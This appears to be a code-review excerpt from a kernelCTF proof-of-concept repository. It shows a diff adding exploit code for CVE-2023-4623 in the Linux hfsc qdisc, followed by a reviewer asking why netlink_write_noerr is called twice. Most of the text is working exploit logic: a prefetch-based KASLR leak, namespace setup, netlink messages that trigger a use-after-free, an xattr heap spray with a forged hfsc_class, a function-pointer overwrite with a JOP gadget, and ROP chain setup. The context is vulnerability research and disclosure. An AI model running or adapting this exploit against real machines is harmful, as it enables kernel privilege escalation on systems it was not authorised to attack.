pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit.c

```diff
@@ -0,0 +1,479 @@
+
+    /* Get kernel base from command line or prefetch side channel */
+    if (argc > 1) {
+        kernel_base = strtoul(argv[1], NULL, 16);
+        printf("[*] Using provided kernel base: %p\n", kernel_base);
+    } else {
+        printf("[*] Using prefetch to leak kernel base...\n");
+        getuid();
+        kernel_base = kaslr_leak(1000, 1000);
+        if (kernel_base == -1) {
+            printf("[*] Prefetch failed\n");
+            exit(EXIT_FAILURE);
+        }
+        printf("[*] Leaked kernel base: %p\n", kernel_base);
+    }
+
+    if (unshare(CLONE_NEWUSER) == -1)
+        err_exit("[-] unshare(CLONE_NEWUSER)");
+    if (unshare(CLONE_NEWNET) == -1)
+        err_exit("[-] unshare(CLONE_NEWNET)");
+
+    /* Open temporary file to use for xattr spray */
+    xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664);
+    if (xattr_fd == -1)
+        err_exit("[-] open");
+
+    /* Open socket to send netlink commands to */
+    int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
+    if (nl_sock_fd == -1)
+        err_exit("[-] nl socket");
+
+    /* Set loopback device up */
+    if_up_msg.ifi.ifi_index = if_nametoindex("lo");
+    netlink_write(nl_sock_fd, &if_up_msg);
+
+    init_nl_msgs();
+
+    /* Trigger vuln */
+    netlink_write(nl_sock_fd, &newqd_msg);
+    netlink_write(nl_sock_fd, &new_rsc_msg);
+    netlink_write(nl_sock_fd, &new_fsc_msg);
+    loopback_send();
+    delc_msg.tm.tcm_handle = def_class_id;
+    netlink_write(nl_sock_fd, &delc_msg);
+
+    printf("[*] Triggered vulnerability\n");
+
+    /* Place fake hfsc_class in xattr */
+
+    /* hfsc_class.level = 1 (must be non-zero) */
+    xattr_buf[LEVEL_OFFSET - XATTR_HEADER_SIZE] = 1;
+    /* hfsc_class.vt_node = 1 (must be odd) */
+    xattr_buf[VT_NODE_OFFSET - XATTR_HEADER_SIZE] = 1;
+    /* hfsc_class.cf_node = 1 (must be odd) */
+    xattr_buf[CF_NODE_OFFSET - XATTR_HEADER_SIZE] = 1;
+    /* hfsc_class.parent = &qfq_change_qdisc (write target)*/
+    long parent = kernel_base + QFQ_CHANGE_QDISC_LOC - CL_CVTMIN_OFFSET;
+    memcpy(xattr_buf + CL_PARENT_OFFSET - XATTR_HEADER_SIZE, &parent, 8);
+    /* hfsc_class.cl_vt = jop_gadget (write value) */
+    long cl_vt = kernel_base + PUSH_RSI_JMP_QWORD_PTR_RSI_0x70;
+    memcpy(xattr_buf + CL_VT_OFFSET - XATTR_HEADER_SIZE, &cl_vt, 8);
+
+    printf("[*] Spraying simple_xattrs...\n");
+    /* Spray simple_xattrs */
+    delc_msg.tm.tcm_handle = vuln_class_id;
+    netlink_write(nl_sock_fd, &delc_msg);
+    spray_simple_xattrs(XATTR_SPRAY);
+
+    /* Create new default class and trigger enqueue/dequeue to overwrite
+     * qfq_change_qdisc with jop gadget */
+    new_fsc_msg.tm.tcm_parent = 1 << 16;
+    netlink_write(nl_sock_fd, &new_fsc_msg);
+
+    printf("[*] Overwriting function pointer\n");
+    loopback_send();
+
+    /* Call overwritten function pointer */
+    init_rop(rop_buf + 4, jop_buf, kernel_base);
+    init_qfq_qdisc_msg(&new_qfq_qdisc);
+    netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc);
```

Comment:
Why is `netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc);` called twice? Is it intentional or a mistake?

If it is intentional then what does the first call do and what does the second call?